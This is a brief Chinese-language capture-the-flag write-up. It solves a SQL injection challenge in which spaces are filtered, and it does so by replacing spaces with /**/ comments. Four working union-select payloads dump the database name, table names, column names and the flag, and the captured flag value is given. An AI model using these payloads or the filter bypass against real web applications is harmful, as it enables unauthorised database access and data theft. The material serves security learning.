小白一个,如果错误请指正!
首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。
那我们就得去学习一下怎么绕过空格过滤:
我们这里使用注释/**/的方法绕过空格过滤。
1.爆数据库
123/**/union/**/select/**/1,database()#
2.爆表名
123/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
3.爆字段
123/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='peijpdqaxg'
4.爆flag
123/**/union/**/select/**/1,yndrkewrmj/**/from/**/sqli.peijpdqaxg
成功拿到flag ctfhub{68d5164ed3d6f1db4b9bdedf}
参考资料:
https://www.cnblogs.com/Vinson404/p/7253255.html